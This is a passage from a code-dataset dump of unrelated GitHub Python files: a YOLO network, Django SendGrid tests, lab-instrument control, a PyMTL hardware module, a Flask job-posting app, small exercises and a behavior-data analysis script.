self.feature_52(x)\n h_26 = self.feature_26(h_52)\n h_13 = self.feature_13(h_26)\n\n conval_13 = self.convolset_13(h_13)\n detection_13 = self.detection_13(conval_13)\n\n up_26 = self.up_26(conval_13)\n route_26 = torch.cat((up_26, h_26), dim=1)\n conval_26 = 
self.convolset_26(route_26)\n detection_26 = self.detection_26(conval_26)\n\n up_52 = self.up_52(conval_26)\n route_52 = torch.cat((up_52, h_52), dim=1)\n conval_52 = self.convolset_52(route_52)\n detection_52 = self.detection_52(conval_52)\n\n return detection_13, detection_26, detection_52\n\n\nif __name__ == \"__main__\":\n\n anchors = [10, 13, 16, 30, 33, 23, 30, 61, 62, 45, 59, 119, 116, 90, 156, 198, 373, 326]\n dete_13_mask = [6, 7, 8]\n dete_26_mask = [3, 4, 5]\n dete_52_mask = [0,1,2]\n","repo_name":"brookicv/DLearning","sub_path":"yolo/darknet53.py","file_name":"darknet53.py","file_ext":"py","file_size_in_byte":5575,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"8343845360","text":"import base64\nimport sys\n\nfrom django.conf import settings\nfrom django.core.mail import EmailMessage, EmailMultiAlternatives\nfrom django.test import override_settings\nfrom django.test.testcases import SimpleTestCase\n\nfrom sendgrid_backend.mail import SendgridBackend\n\nif sys.version_info >= (3.0, 0.0, ):\n from email.mime.image import MIMEImage\nelse:\n from email.MIMEImage import MIMEImage\n\n\nclass TestMailGeneration(SimpleTestCase):\n\n # Any assertDictEqual failures will show the entire diff instead of just a snippet\n maxDiff = None\n\n @classmethod\n def setUpClass(self):\n super(TestMailGeneration, self).setUpClass()\n with override_settings(EMAIL_BACKEND=\"sendgrid_backend.SendgridBackend\",\n SENDGRID_API_KEY=\"DUMMY_API_KEY\"):\n self.backend = SendgridBackend()\n\n def test_EmailMessage(self):\n msg = EmailMessage(\n subject=\"Hello, World!\",\n body=\"Hello, World!\",\n from_email=\"Sam Smith \",\n to=[\"John Doe \", \"jane.doe@example.com\"],\n cc=[\"Stephanie Smith \"],\n bcc=[\"Sarah Smith \"],\n reply_to=[\"Sam Smith \"],\n )\n\n result = self.backend._build_sg_mail(msg)\n expected = {\n \"personalizations\": [{\n \"to\": [{\n \"email\": \"john.doe@example.com\",\n \"name\": \"John Doe\"\n }, {\n \"email\": \"jane.doe@example.com\",\n }],\n \"cc\": [{\n \"email\": \"stephanie.smith@example.com\",\n \"name\": \"Stephanie Smith\"\n }],\n \"bcc\": [{\n \"email\": \"sarah.smith@example.com\",\n \"name\": \"Sarah Smith\"\n }],\n \"subject\": \"Hello, World!\"\n }],\n \"from\": {\n \"email\": \"sam.smith@example.com\",\n \"name\": \"Sam Smith\"\n },\n \"mail_settings\": {\n \"sandbox_mode\": {\n \"enable\": False\n }\n },\n \"reply_to\": {\n \"email\": \"sam.smith@example.com\",\n \"name\": \"Sam Smith\"\n },\n \"subject\": \"Hello, World!\",\n \"tracking_settings\": {\"open_tracking\": {\"enable\": True}},\n \"content\": [{\n \"type\": \"text/plain\",\n \"value\": \"Hello, World!\"\n }]\n }\n\n self.assertDictEqual(result, expected)\n\n def test_EmailMessage_attributes(self):\n \"\"\"Test that send_at and categories attributes are correctly written through to output.\"\"\"\n msg = EmailMessage(\n subject=\"Hello, World!\",\n body=\"Hello, World!\",\n from_email=\"Sam Smith \",\n to=[\"John Doe \", \"jane.doe@example.com\"],\n )\n\n # Set new attributes as message property\n msg.send_at = 1518108670\n msg.categories = ['mammal', 'dog']\n\n result = self.backend._build_sg_mail(msg)\n expected = {\n \"personalizations\": [{\n \"to\": [{\n \"email\": \"john.doe@example.com\",\n \"name\": \"John Doe\"\n }, {\n \"email\": \"jane.doe@example.com\",\n }],\n \"subject\": \"Hello, World!\",\n \"send_at\": 1518108670,\n }],\n \"from\": {\n \"email\": \"sam.smith@example.com\",\n \"name\": \"Sam Smith\"\n },\n \"mail_settings\": 
{\n \"sandbox_mode\": {\n \"enable\": False\n }\n },\n \"subject\": \"Hello, World!\",\n \"tracking_settings\": {\"open_tracking\": {\"enable\": True}},\n \"content\": [{\n \"type\": \"text/plain\",\n \"value\": \"Hello, World!\"\n }],\n \"categories\": ['mammal', 'dog'],\n }\n\n self.assertDictEqual(result, expected)\n\n def test_EmailMultiAlternatives(self):\n msg = EmailMultiAlternatives(\n subject=\"Hello, World!\",\n body=\" \",\n from_email=\"Sam Smith \",\n to=[\"John Doe \", \"jane.doe@example.com\"],\n cc=[\"Stephanie Smith \"],\n bcc=[\"Sarah Smith \"],\n reply_to=[\"Sam Smith \"],\n )\n\n msg.attach_alternative(\"Hello World!\", \"text/html\")\n \n # Test CSV attachment\n msg.attach(\"file.csv\", \"1,2,3,4\", \"text/csv\")\n result = self.backend._build_sg_mail(msg)\n expected = {\n \"personalizations\": [{\n \"to\": [{\n \"email\": \"john.doe@example.com\",\n \"name\": \"John Doe\"\n }, {\n \"email\": \"jane.doe@example.com\",\n }],\n \"cc\": [{\n \"email\": \"stephanie.smith@example.com\",\n \"name\": \"Stephanie Smith\"\n }],\n \"bcc\": [{\n \"email\": \"sarah.smith@example.com\",\n \"name\": \"Sarah Smith\"\n }],\n \"subject\": \"Hello, World!\"\n }],\n \"from\": {\n \"email\": \"sam.smith@example.com\",\n \"name\": \"Sam Smith\"\n },\n \"mail_settings\": {\n \"sandbox_mode\": {\n \"enable\": False\n }\n },\n \"reply_to\": {\n \"email\": \"sam.smith@example.com\",\n \"name\": \"Sam Smith\"\n },\n \"subject\": \"Hello, World!\",\n \"tracking_settings\": {\"open_tracking\": {\"enable\": True}},\n \"attachments\": [{\n \"content\": \"MSwyLDMsNA==\",\n \"filename\": \"file.csv\",\n \"type\": \"text/csv\"\n }],\n \"content\": [{\n \"type\": \"text/plain\",\n \"value\": \" \",\n }, {\n \"type\": \"text/html\",\n \"value\": \"Hello World!\",\n }]\n }\n\n self.assertDictEqual(result, expected)\n\n def test_reply_to(self):\n kwargs = {\n \"subject\": \"Hello, World!\",\n \"body\": \"Hello, World!\",\n \"from_email\": \"Sam Smith \",\n \"to\": [\"John Doe \"],\n \"reply_to\": [\"Sam Smith \"],\n \"headers\": {\"Reply-To\": \"Stephanie Smith \"}\n }\n\n # Test different values in Reply-To header and reply_to prop\n msg = EmailMessage(**kwargs)\n with self.assertRaises(ValueError):\n self.backend._build_sg_mail(msg)\n\n # Test different names (but same email) in Reply-To header and reply_to prop\n kwargs[\"headers\"] = {\"Reply-To\": \"Bad Name \"}\n msg = EmailMessage(**kwargs)\n with self.assertRaises(ValueError):\n self.backend._build_sg_mail(msg)\n\n # Test same name/email in both Reply-To header and reply_to prop\n kwargs[\"headers\"] = {\"Reply-To\": \"Sam Smith \"}\n msg = EmailMessage(**kwargs)\n result = self.backend._build_sg_mail(msg)\n self.assertDictEqual(result[\"reply_to\"], {\"email\": \"sam.smith@example.com\", \"name\": \"Sam Smith\"})\n\n def test_mime(self):\n msg = EmailMultiAlternatives(\n subject=\"Hello, World!\",\n body=\" \",\n from_email=\"Sam Smith \",\n to=[\"John Doe \", \"jane.doe@example.com\"],\n )\n\n content = ''\n msg.attach_alternative(content, \"text/html\")\n with open(\"test/linux-penguin.png\", \"rb\") as f:\n img = MIMEImage(f.read())\n img.add_header(\"Content-ID\", \"linux_penguin\")\n msg.attach(img)\n\n result = self.backend._build_sg_mail(msg)\n self.assertEqual(len(result[\"content\"]), 2)\n self.assertDictEqual(result[\"content\"][0], {\"type\": \"text/plain\", \"value\": \" \"})\n self.assertDictEqual(result[\"content\"][1], {\"type\": \"text/html\", \"value\": content})\n self.assertEqual(len(result[\"attachments\"]), 1)\n with 
open(\"test/linux-penguin.png\", \"rb\") as f:\n if sys.version_info >= (3.0, 0.0, ):\n self.assertEqual(bytearray(result[\"attachments\"][0][\"content\"], \"utf-8\"), base64.b64encode(f.read()))\n else:\n self.assertEqual(result[\"attachments\"][0][\"content\"], base64.b64encode(f.read()))\n self.assertEqual(result[\"attachments\"][0][\"type\"], \"image/png\")\n\n def test_templating(self):\n msg = EmailMessage(\n subject=\"Hello, World!\",\n body=\"Hello, World!\",\n from_email=\"Sam Smith \",\n to=[\"John Doe \", \"jane.doe@example.com\"],\n )\n msg.template_id = \"test_template\"\n result = self.backend._build_sg_mail(msg)\n\n self.assertIn(\"template_id\", result)\n self.assertEquals(result[\"template_id\"], \"test_template\")\n\n\n \"\"\"\n todo: Implement these\n def test_attachments(self):\n pass\n\n def test_headers(self):\n pass\n\n \"\"\"\n","repo_name":"MIKNOTAURO/django-sendgrid-v5","sub_path":"test/test_mail.py","file_name":"test_mail.py","file_ext":"py","file_size_in_byte":9594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"12359939955","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 07 11:47:39 2014\n\n@author: Eusebio OLG\n\"\"\"\n\nimport visa\n\ndef connect2inst(to):\n \n global rm, devs, LCR\n rm = visa.ResourceManager()\n\n #devs = rm.list_resources()[0]\n #LCR = rm.get_instrument(devs, timeout=to) #opens the instrument and assings it to class LCR\n LCR = rm.get_instrument('TCPIP0::192.168.185.127::inst0::INSTR') \n \n LCR.write('*cls;:abor;:disp:ccl')\n\n return LCR","repo_name":"eolalde/E4980A","sub_path":"lcr_com/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"3231971113","text":"#====================================================================\n# FindMax\n#====================================================================\nfrom pymtl import *\nfrom pclib.rtl import GtComparator, RegEnRst, RegRst, Mux\nfrom pclib.ifcs import InValRdyBundle, OutValRdyBundle\nfrom FindMaxMsg import FindMaxReqMsg, FindMaxRespMsg\n\nimport math\n\n#====================================================================\n# FindMax Datapath\n#====================================================================\nclass FindMaxDpathRTL( Model ):\n\n # Constructor\n def __init__( s, nbits = 6, k = 3 ):\n \n # Interface\n s.req_msg_data = InPort (nbits)\n s.resp_msg_data = OutPort (nbits)\n s.resp_msg_idx = OutPort ( int( math.ceil( math.log( k , 2 ) ) ) ) \n \n # dpath->ctrl\n s.isLarger = OutPort (1)\n\n # ctrl->dapth\n s.max_reg_en = InPort (1)\n s.idx_reg_en = InPort (1)\n s.knn_mux_sel = InPort (1)\n s.knn_counter = InPort ( int( math.ceil( math.log( k , 2 ) ) ) ) # max 3\n \n # Internal Signals\n s.knn_data0 = Wire( Bits(nbits) )\n\n s.connect( s.req_msg_data, s.knn_data0 )\n\n # knn Mux \n s.knn_data1 = Wire( Bits(nbits) )\n s.max_reg_out = Wire( Bits(nbits) )\n\n s.knn_mux = m = Mux( nbits, 2 )\n s.connect_dict({\n m.sel : s.knn_mux_sel,\n m.in_[0] : s.req_msg_data,\n m.in_[1] : s.max_reg_out,\n m.out : s.knn_data1\n })\n\n # Greater than comparator\n s.knn_GtComparator = m = GtComparator( nbits )\n s.connect_dict({\n m.in0 : s.knn_data0,\n m.in1 : s.knn_data1,\n m.out : s.isLarger\n })\n\n # Max Reg \n s.max_reg = m = RegEnRst( nbits )\n s.connect_dict({\n m.en : s.max_reg_en,\n m.in_ : s.knn_data0,\n m.out : s.max_reg_out\n })\n \n # Idx Reg \n s.idx_reg = m = RegEnRst( int( 
math.ceil( math.log( k , 2 ) ) ) ) # max 2\n s.connect_dict({\n m.en : s.idx_reg_en,\n m.in_ : s.knn_counter,\n m.out : s.resp_msg_idx\n })\n \n s.connect( s.max_reg_out, s.resp_msg_data )\n\n#====================================================================\n# FindMax Control Unit\n#====================================================================\nclass FindMaxCtrlRTL( Model ):\n \n # Constructor\n def __init__( s, nbits = 6, k = 3 ):\n\n # Interface\n s.req_val = InPort (1)\n s.req_rdy = OutPort (1)\n\n s.resp_val = OutPort (1)\n s.resp_rdy = InPort (1)\n\n # dpath->ctrl\n s.isLarger = InPort (1)\n\n # ctrl->dapth\n s.max_reg_en = OutPort (1)\n s.idx_reg_en = OutPort (1)\n s.knn_mux_sel = OutPort (1)\n s.knn_counter = OutPort ( int( math.ceil( math.log( k , 2 ) ) ) ) # max 3\n\n # internal signal\n s.count_go = Wire( Bits(1) )\n\n # states\n s.STATE_IDLE = 0 \n s.STATE_CMP = 1 # do compare or store reference data\n s.STATE_DONE = 2 # return max value and its index\n\n s.state = RegRst( 2, reset_value = s.STATE_IDLE )\n \n # Counters\n s.knn_count = Wire ( int( math.ceil( math.log( k, 2) ) ) ) # max 3\n\n @s.tick\n def counter():\n if ( s.count_go == 1 ):\n s.knn_count.next = s.knn_count + 1\n else:\n s.knn_count.next = 0\n \n #------------------------------------------------------\n # state transtion logic\n #------------------------------------------------------\n\n @s.combinational\n def state_transitions():\n \n curr_state = s.state.out\n next_state = s.state.out\n\n if ( curr_state == s.STATE_IDLE ):\n if ( s.req_val and s.req_rdy ):\n next_state = s.STATE_CMP\n\n if ( curr_state == s.STATE_CMP ):\n if ( s.knn_count == k - 1 ):\n next_state = s.STATE_DONE\n\n if ( curr_state == s.STATE_DONE ):\n if ( s.resp_val and s.resp_rdy ):\n next_state = s.STATE_IDLE\n\n s.state.in_.value = next_state\n\n\n #------------------------------------------------------\n # state output logic\n #------------------------------------------------------\n \n @s.combinational\n def state_outputs():\n \n current_state = s.state.out\n\n if ( current_state == s.STATE_IDLE ):\n s.req_rdy.value = 1\n s.resp_val.value = 0\n\n s.max_reg_en.value = 1\n s.idx_reg_en.value = 1\n s.knn_mux_sel.value = 0\n if ( s.req_val and s.req_rdy ):\n s.count_go.value = 1\n else: \n s.count_go.value = 0\n\n elif ( current_state == s.STATE_CMP ):\n s.resp_val.value = 0\n s.count_go.value = 1\n \n s.req_rdy.value = 1\n s.knn_mux_sel.value = 1\n if ( s.isLarger == 1):\n s.idx_reg_en.value = 1\n s.max_reg_en.value = 1\n else:\n s.idx_reg_en.value = 0\n s.max_reg_en.value = 0\n \n elif ( current_state == s.STATE_DONE ):\n s.req_rdy.value = 0\n s.resp_val.value = 1\n\n s.max_reg_en.value = 0\n s.idx_reg_en.value = 0\n s.knn_mux_sel.value = 0\n s.count_go.value = 0\n\n s.connect( s.knn_count, s.knn_counter )\n\n\n#====================================================================\n# FindMax Top Level\n#====================================================================\nclass FindMaxPRTL( Model ):\n\n # Constructor\n def __init__( s, nbits = 6, k = 3 ):\n \n # Interface\n s.req = InValRdyBundle ( FindMaxReqMsg() ) \n s.resp = OutValRdyBundle ( FindMaxRespMsg() )\n\n # Instantiate datapath and control\n s.dpath = FindMaxDpathRTL( nbits, k = 3 )\n s.ctrl = FindMaxCtrlRTL ( nbits, k = 3 )\n\n # connect input interface to dpath/ctrl\n s.connect( s.req.msg.data, s.dpath.req_msg_data )\n\n s.connect( s.req.val, s.ctrl.req_val )\n s.connect( s.resp.rdy, s.ctrl.resp_rdy )\n \n # connect dpath/ctrl to output interface\n s.connect( 
s.dpath.resp_msg_data, s.resp.msg.data )\n s.connect( s.dpath.resp_msg_idx, s.resp.msg.idx ) \n \n s.connect( s.ctrl.req_rdy, s.req.rdy )\n s.connect( s.ctrl.resp_val, s.resp.val )\n\n # connect dpath/ctrl\n s.connect( s.dpath.isLarger, s.ctrl.isLarger )\n s.connect( s.ctrl.max_reg_en, s.dpath.max_reg_en )\n s.connect( s.ctrl.idx_reg_en, s.dpath.idx_reg_en )\n s.connect( s.ctrl.knn_mux_sel, s.dpath.knn_mux_sel )\n s.connect( s.ctrl.knn_counter, s.dpath.knn_counter )\n\n def line_trace( s ):\n\n state_str = \"? \"\n if s.ctrl.state.out == s.ctrl.STATE_IDLE:\n state_str = \"IDLE\"\n if s.ctrl.state.out == s.ctrl.STATE_CMP :\n state_str = \"CMP \"\n if s.ctrl.state.out == s.ctrl.STATE_DONE :\n state_str = \"DONE\"\n\n return \"{} ({}>?{} max{} count{} idx_en{} {}) {}\".format(\n s.req,\n s.dpath.knn_data0,\n s.dpath.knn_data1,\n s.resp.msg.data,\n s.dpath.knn_counter,\n s.dpath.idx_reg_en,\n state_str,\n s.resp\n )\n\n","repo_name":"xiaotan2/meng-reconfigurable-computing","sub_path":"digitrec_gen/FindMaxPRTL.py","file_name":"FindMaxPRTL.py","file_ext":"py","file_size_in_byte":7057,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"10221059172","text":"from flask import Blueprint, render_template, request, url_for, redirect, session, jsonify\nfrom flask_pymongo import PyMongo\nfrom werkzeug.utils import secure_filename\nimport os\nfrom bson.objectid import ObjectId\nimport sys,fitz\nimport docx2txt\nfrom database import mongo\nfrom datetime import datetime\nimport jd_profile_comparison\nimport pickle\n\njob_post = Blueprint(\"Job_post\", __name__, static_folder=\"static\", template_folder=\"templates\")\n\nUF = \"static/Job_Description\"\nJOBS = mongo.db.JOBS\nApplied_EMP = mongo.db.Applied_EMP\nresumeFetchedData = mongo.db.resumeFetchedData\njob_compare_obj = pickle.load(open(\"jd_profile_comparison.pkl\",\"rb\"))\ndef allowedExtension(filename):\n return '.' in filename and filename.rsplit('.',1)[1].lower() in ['docx','pdf']\n\ndef extractData(file,ext):\n text=\"\"\n if ext==\"docx\": \n temp = docx2txt.process(file)\n text = [line.replace('\\t', ' ') for line in temp.split('\\n') if line]\n text = ' '.join(text)\n if ext==\"pdf\":\n for page in fitz.open(file):\n text = text + str(page.getText())\n text = \" \".join(text.split('\\n'))\n return text\n@job_post.route(\"/\")\ndef home():\n return \"
test
\"\n\n@job_post.route(\"/post_job\")\ndef JOB_POST():\n fetched_jobs = None\n fetched_jobs = JOBS.find({},{\"_id\":1,\"Job_Profile\":1,\"CompanyName\":1,\"CreatedAt\":1,\"Job_description_file_name\":1,\"LastDate\":1,\"Salary\":1}).sort([(\"CreatedAt\",-1)])\n if fetched_jobs == None:\n return render_template(\"job_post.html\",errorMsg=\"Problem in Jobs Fetched\")\n else:\n jobs={}\n cnt = 0\n for i in fetched_jobs: \n jobs[cnt] = {\"job_id\":i['_id'],\"Job_Profile\":i['Job_Profile'],\"CompanyName\":i['CompanyName'],\"CreatedAt\":i['CreatedAt'],\"Job_description_file_name\":i['Job_description_file_name'],'LastDate':i['LastDate'],\"Salary\":i['Salary'] }\n cnt += 1\n return render_template(\"job_post.html\",len = len(jobs), data = jobs)\n\n@job_post.route(\"/add_job\", methods=[\"POST\"])\ndef ADD_JOB():\n try:\n file = request.files['jd']\n job_profile = str(request.form.get('jp'))\n company = str(request.form.get('company'))\n last_date = str(request.form.get('last_date'))\n salary = str(request.form.get('salary'))\n filename = secure_filename(file.filename)\n jd_id = ObjectId()\n path = os.path.join(UF,str(jd_id))\n os.mkdir(path)\n file.save(os.path.join(path,filename))\n fetchedData = extractData(path+\"/\"+filename,file.filename.rsplit('.',1)[1].lower())\n result = None\n result = JOBS.insert_one({\"_id\":jd_id,\"Job_Profile\":job_profile,\"Job_Description\":fetchedData,\"CompanyName\":company,\"LastDate\":last_date,\"CreatedAt\":datetime.now(),\"Job_description_file_name\":filename,\"Salary\":salary})\n if result == None:\n return render_template(\"job_post.html\",errorMsg=\"Error Ocuured\")\n else:\n return redirect('/HR1/post_job')\n #return render_template(\"job_post.html\",successMsg=\"Job Posted Successfully\")\n \n except Exception:\n print(\"Exception Occured\")\n\n@job_post.route(\"/show_job\")\ndef show_job():\n fetched_jobs = None\n fetched_jobs = JOBS.find({},{\"_id\":1,\"Job_Profile\":1,\"CompanyName\":1,\"CreatedAt\":1,\"Job_description_file_name\":1,\"LastDate\":1,\"Salary\":1}).sort([(\"CreatedAt\",-1)])\n if fetched_jobs == None:\n return render_template(\"All_jobs.html\",errorMsg=\"Problem in Jobs Fetched\")\n else:\n jobs={}\n cnt = 0\n \n for i in fetched_jobs:\n jobs[cnt] = {\"job_id\":i['_id'],\"Job_Profile\":i['Job_Profile'],\"CompanyName\":i['CompanyName'],\"CreatedAt\":i['CreatedAt'],\"Job_description_file_name\":i['Job_description_file_name'],'LastDate':i['LastDate'],\"Salary\":i['Salary']}\n cnt += 1\n return render_template(\"All_jobs.html\",len = len(jobs), data = jobs)\n\n@job_post.route(\"/apply_job\",methods=[\"POST\"])\ndef APPLY_JOB():\n job_id = request.form['job_id']\n jd_data = JOBS.find_one({\"_id\":ObjectId(job_id)},{\"Job_Description\":1})\n emp_data = resumeFetchedData.find_one({\"UserId\":ObjectId(session['user_id'])},{\"ResumeData\":1})\n match_percentage = job_compare_obj.match(str(jd_data['Job_Description']),str(emp_data['ResumeData']))\n result = None\n result = Applied_EMP.insert_one({\"job_id\":ObjectId(job_id),\"user_id\":ObjectId(session['user_id']),\"User_name\":session['user_name'],\"Matching_percentage\":match_percentage})\n if result == None:\n return jsonify({\"StatusCode\":400,\"Message\":\"Problem in Applying\"})\n return jsonify({\"StatusCode\":200,\"Message\":\"Applied Successfully\"})\n\n@job_post.route(\"/view_applied_candidates\",methods=[\"POST\",\"GET\"])\ndef view_applied_candidates():\n job_id = request.form['job_id']\n result_data = None\n result_data = 
Applied_EMP.find({\"job_id\":ObjectId(job_id)},{\"User_name\":1,\"Matching_percentage\":1}).sort([(\"Matching_percentage\",-1)])\n if result_data == None:\n return {\"StatusCode\":400,\"Message\":\"Problem in Fetching\"}\n else:\n result = {}\n cnt = 0\n result[0]=cnt\n result[1]=200\n for i in result_data:\n result[cnt+2] = {\"Name\":i['User_name'],\"Match\":i['Matching_percentage']}\n cnt+=1\n result[0]=cnt\n print(\"Result\",result,type(result))\n return result","repo_name":"pranavvikh03/ResumeRanker_Shared","sub_path":"Job_post.py","file_name":"Job_post.py","file_ext":"py","file_size_in_byte":5331,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"37591898031","text":"class Solution(object):\n def productExceptSelf(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n output = list(nums)\n l = len(output)\n # check if list is empty\n if (l == 0):\n return output\n \n # calculate left product of numbers\n for i in range(1, l):\n output[i] *= output[i - 1]\n \n # store right product in rprod and update output \n rprod = 1\n for i in range(l - 1, 0, -1):\n output[i] = output[i - 1] * rprod\n rprod *= nums[i]\n \n output[0] = rprod\n \n return output\n","repo_name":"goelhardik/programming","sub_path":"leetcode/product_of_array_except_self/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31241063578","text":"# from subprocess import call\nimport subprocess\n\nsubprocess.call('ls')\n\n# time = subprocess.Popen('date', stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n# output, err = time.communicate()\n\ntime = subprocess.check_output('date')\n\nprint('IT is', time)","repo_name":"dlsrks1218/Algorithm_Study","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33262200461","text":"\"\"\"def triangle(a,b,c):\r\n if a<0 or b<0 or c<0:\r\n raise Exception('三角形边长不能为负数')\r\n elif a+b<=c or a+c<=b or b+c<=a:\r\n raise Exception('三角形两边之和需大于第三边')\r\n else:\r\n print('三角形三边长为:',a,b,c)\r\nif __name__ == '__main__':\r\n try:\r\n a=int(input('请输入数字'))\r\n b=int(input('请输入数字'))\r\n c=int(input('请输入数字'))\r\n triangle(a,b,c)\r\n except ValueError as f:\r\n print(f)\r\n圆的面积及周长\r\nimport math\r\nclass Circle:\r\n def __init__(self,r):\r\n self.r=r\r\n\r\n def area(self):\r\n return math.pi*pow(r,2)\r\n def s(self):\r\n return 2*math.pi*r\r\n\r\nif __name__ == '__main__':\r\n r=int(input('请输入半径'))\r\n print('周长为',Circle.s(r))\r\n print('面积为',Circle.area(r))\r\n\r\n print(f'周长为{Circle.s(r):.2f}')\r\n print(f'周长为{Circle.area(r):.2f}')\r\n\"\"\"\r\nclass Student:\r\n def __init__(self,name,age,sex,grade):\r\n self.name=name\r\n self.age=age\r\n self.sex=sex\r\n self.grade=grade\r\n def s(self):\r\n print(self.name,self.age,self.sex,self.grade)\r\n\r\nif __name__ == '__main__':\r\n lst=[]\r\n for i in range(0,5):\r\n info=input(f'请输入第{i+1}为信息(例:姓名#年龄#性别#成绩#)')\r\n ls=info.split('#')\r\n l=Student(ls[0],ls[1],ls[2],ls[3])\r\n lst.append(l)\r\n for item in lst:\r\n item.s()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"hialgorithm/python","sub_path":"10月/10.1.py","file_name":"10.1.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} 
+{"seq_id":"17897896847","text":"from os import listdir\nfrom sys import argv\nimport pandas as pd\nfrom plotnine import *\nimport numpy as np\nfrom scipy import stats\nimport argparse\nfrom os import path\n\n\ndef group_data_by_mouse(data):\n byMouse = (data.groupby(['Mouse','Genotype', 'Condition','Behavior','Window'])\n .agg('sum').reset_index()\n )\n return (byMouse.sort_values('Window', kind='mergesort')\n .sort_values('Mouse', kind='mergesort')\n .sort_values('Behavior', kind='mergesort')\n .sort_values('Condition', kind='mergesort')\n )\n\ndef flattenHierarchicalCol(col,sep = '_'):\n if not type(col) is tuple:\n return col\n else:\n new_col = ''\n for leveli,level in enumerate(col):\n if not level == '':\n if not leveli == 0:\n new_col += sep\n new_col += level\n return new_col\n\ndef group_and_average_data(data):\n byMouse = group_data_by_mouse(data)\n byWindow = byMouse.groupby(['Genotype', 'Condition', 'Behavior', 'Window']).aggregate([np.mean, np.std, stats.sem]).reset_index()\n byWindow.columns = byWindow.columns.map(flattenHierarchicalCol)\n byWindow['Duration_error_min'] = byWindow['Duration_mean'] - byWindow['Duration_sem']\n byWindow['Duration_error_max'] = byWindow['Duration_mean'] + byWindow['Duration_sem']\n return byWindow\n\ndef makePlot(events, behavior):\n data = group_and_average_data(events)\n plot = (\n ggplot(aes(x='Window', y='Duration_mean', color='Genotype', shape='Condition'),\n data=data[data['Behavior']==behavior])\n + geom_point()\n + geom_line()\n + geom_errorbar(aes(ymin = 'Duration_error_min', ymax='Duration_error_max'))\n )\n return plot\n\ndef parseLine(line):\n parts = line.split(',')\n behavior = parts[0][1:-1].strip()\n status = parts[1].strip()\n latency = int(parts[4].strip())\n mouse = parts[6].strip()\n genotype = 'WT'\n if \"5AR2KO\" in mouse:\n genotype = '5AR2KO'\n condition = \"Exercise\"\n if \"Sedentary\" in mouse:\n condition = \"Sedentary\"\n \n record = {\n 'status': status,\n 'mouse': mouse,\n 'condition': condition,\n 'genotype': genotype,\n 'behavior': behavior,\n 'latency': latency\n }\n\n return record\n\ndef findMatchingEndRecord(lines, startRecord, startLine):\n j = startLine + 1\n while j < len(lines):\n if len(lines[j].strip()) <= 0:\n j = j + 1\n continue\n endRecord = parseLine(lines[j])\n if (endRecord['status'] == 'Ended' and endRecord['behavior'] == startRecord['behavior']):\n break\n j = j + 1\n if j >= len(lines):\n print(\"Error: Record\\n{}\\nhas no matching 'Ended' record\")\n exit()\n return endRecord\n\ndef makeEventRecord(record, window, duration):\n return {\n 'mouse': record['mouse'],\n 'condition': record['condition'],\n 'genotype': record['genotype'],\n 'behavior': record['behavior'],\n 'window': window,\n 'duration': duration\n }\n\ndef bucketData(sourceFiles, windowSize):\n events = []\n for file in sourceFiles:\n with open(file, 'r') as file:\n lines = file.readlines()\n for i in range(3, len(lines)):\n line = lines[i]\n if len(line.strip()) == 0:\n continue\n record = parseLine(line)\n if record['status'] == 'Started':\n endRecord = findMatchingEndRecord(lines, record, i)\n startTime = record['latency']\n endTime = endRecord['latency']\n startWindow = int(startTime / windowSize)\n endWindow = int(endTime / windowSize)\n\n if (startWindow == endWindow):\n duration = endTime - startTime\n else:\n duration = windowSize - startTime % windowSize # duration remaining in starting window\n\n # Compute duration of behavior in last window and create a record\n finalWindowDuration = endTime % windowSize\n if 
finalWindowDuration > 0: # Only output a record if any time was spent in the ending window\n events.append(makeEventRecord(record, endWindow, finalWindowDuration))\n \n # Add a record for each intermediate (full) window\n for window in range(startWindow+1, endWindow):\n events.append(makeEventRecord(record, window, windowSize))\n # Output a record for the starting window if it is a non-zero amount of time\n if duration > 0:\n events.append(makeEventRecord(record, startWindow, duration))\n return events\n\ndef eventsToDataFrame(events):\n mouse = []\n condition = []\n genotype = []\n behavior = []\n window = []\n duration = []\n for event in events:\n mouse.append(event['mouse'])\n condition.append(event['condition'])\n genotype.append(event['genotype'])\n behavior.append(event['behavior'])\n window.append(event['window'])\n duration.append(event['duration'])\n data = {\n 'Mouse': mouse,\n 'Condition': condition,\n 'Genotype': genotype,\n 'Behavior': behavior,\n 'Window': window,\n 'Duration': duration\n }\n\n return pd.DataFrame(data)\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description='Process data exported from Behaviortracker.')\n # source dir (default .)\n # windowed csv output file (windowed.csv)\n # window duration (60 seconds)\n # plot behavior (-p Struggling)\n # group by mouse\n # averaged data output\n parser.add_argument('-s', '--source', nargs='+')\n parser.add_argument('-o', '--output', default='bt')\n parser.add_argument('-g', '--graph', nargs='+')\n parser.add_argument('-p', '--period', default=60, type=int)\n parser.add_argument('-w', '--windowedfile', action='store_true')\n parser.add_argument('-m', '--mousefile', action='store_true')\n parser.add_argument('-a', '--averagedfile', action='store_true')\n\n options = parser.parse_args()\n\n print(options)\n\n if options.source == None:\n options.source = ['.']\n sourceFiles = []\n for source in options.source:\n if path.isfile(source):\n sourceFiles.append(source)\n elif path.isdir(source):\n sourceFiles.extend(filter(lambda x: x.endswith('.csv'),listdir(source)))\n else:\n print('Error: {} is not a valid file or directory.'.format(source))\n exit()\n\n events = 